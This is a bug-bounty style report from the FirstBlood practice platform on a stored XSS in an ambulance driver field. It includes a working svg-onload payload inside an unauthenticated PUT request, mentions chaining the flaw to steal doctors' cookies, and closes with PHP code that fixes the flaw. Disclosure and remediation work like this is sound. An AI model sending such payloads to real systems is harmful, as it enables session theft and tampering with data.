FirstBlood-#1552 Stored XSS in ambulance driver
This issue was discovered on FirstBlood v3



On 2022-12-11, pichik Level 4 reported:

Hi,

DESCRIPTION:

Found that the driver field in ambulances is vulnerable to XSS.
As the /api/manageambulances.php endpoint is publicly editable, an attacker can use this to insert XSS into them.

There is no filtering in place, so the payload is as simple as: <svg onload=alert(document.domain)>

Here is the POST request:

PUT /api/manageambulances.php HTTP/1.1
Host: 63c0f77f87b7-pichik.a.firstbloodhackers.com
Content-Length: 138

{
"driver":"<svg onload=alert(document.domain)>",
"number":"1337",
"ambId":"1e69d88d-08f9-4429-890c-bd11d4bd3e09",
"doctorPhoto":""
}

The XSS is triggered when a user visits their appointment with the affected ambulance.
The ID of the ambulance can be obtained from /api/ambulances.php?select=all, which I reported before.

POC SCREEN:

I used <body onload=''> for this demonstration.

IMPACT:

An attacker can chain more vulnerabilities to insert XSS into ambulance drivers and steal the cookies of doctors.

REMEDIATION:

Apply HTML encoding to all user inputs.

P2 High

Endpoint: /api/manageambulances.php

Parameter: driver

Payload: <svg onload=alert(document.domain)>


FirstBlood ID: 76
Vulnerability Type: Stored XSS

There is a stored XSS vulnerability on /ambulances.php via a malicious driver's name.

FirstBlood ID: 73
Vulnerability Type: Stored XSS

The endpoint /api/manageambulances.php will respond to an unauthenticated PUT request, which allows an attacker to modify the information.
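The two fixes that FirstBlood IDs 73 and 76 call for, as an added example that is not FirstBlood's own code: the PUT handler in /api/manageambulances.php requires an authenticated session, and /ambulances.php HTML-encodes the stored driver name at the point it is written into the page. The PDO handle, table and column names, the session key and the driver-name validation rule are assumptions.

```php
<?php
// Added example, not the FirstBlood code base. $pdo, the "ambulances" table,
// its columns and $_SESSION['user_id'] are assumed names.
declare(strict_types=1);

session_start();

// Fix for FirstBlood ID 73: the PUT handler must reject unauthenticated callers
// and validate the JSON body before touching the database.
function handle_put(PDO $pdo): void {
    if (empty($_SESSION['user_id'])) {
        http_response_code(401);
        exit(json_encode(['error' => 'authentication required']));
    }
    $body = json_decode(file_get_contents('php://input'), true);
    if (!is_array($body) || empty($body['ambId']) || !isset($body['driver'], $body['number'])) {
        http_response_code(400);
        exit(json_encode(['error' => 'invalid request body']));
    }
    // Assumed allow-list for a driver name: letters, spaces, periods, apostrophes, hyphens.
    // This narrows what can be stored; it does not replace output encoding below.
    if (!preg_match('/^[\p{L} .\'-]{1,64}$/u', (string)$body['driver'])) {
        http_response_code(400);
        exit(json_encode(['error' => 'invalid driver name']));
    }
    $stmt = $pdo->prepare('UPDATE ambulances SET driver = ?, number = ? WHERE ambId = ?');
    $stmt->execute([(string)$body['driver'], (string)$body['number'], (string)$body['ambId']]);
    echo json_encode(['ok' => true]);
}

// Fix for FirstBlood ID 76: encode every stored value when it is rendered as HTML.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering as the report describes (driver name echoed raw):
//   echo '<td>' . $row['driver'] . '</td>';
// Hardened rendering: the reported <svg onload=...> payload becomes inert text.
function render_driver_cell(array $row): string {
    return '<td>' . h((string)$row['driver']) . '</td>';
}
```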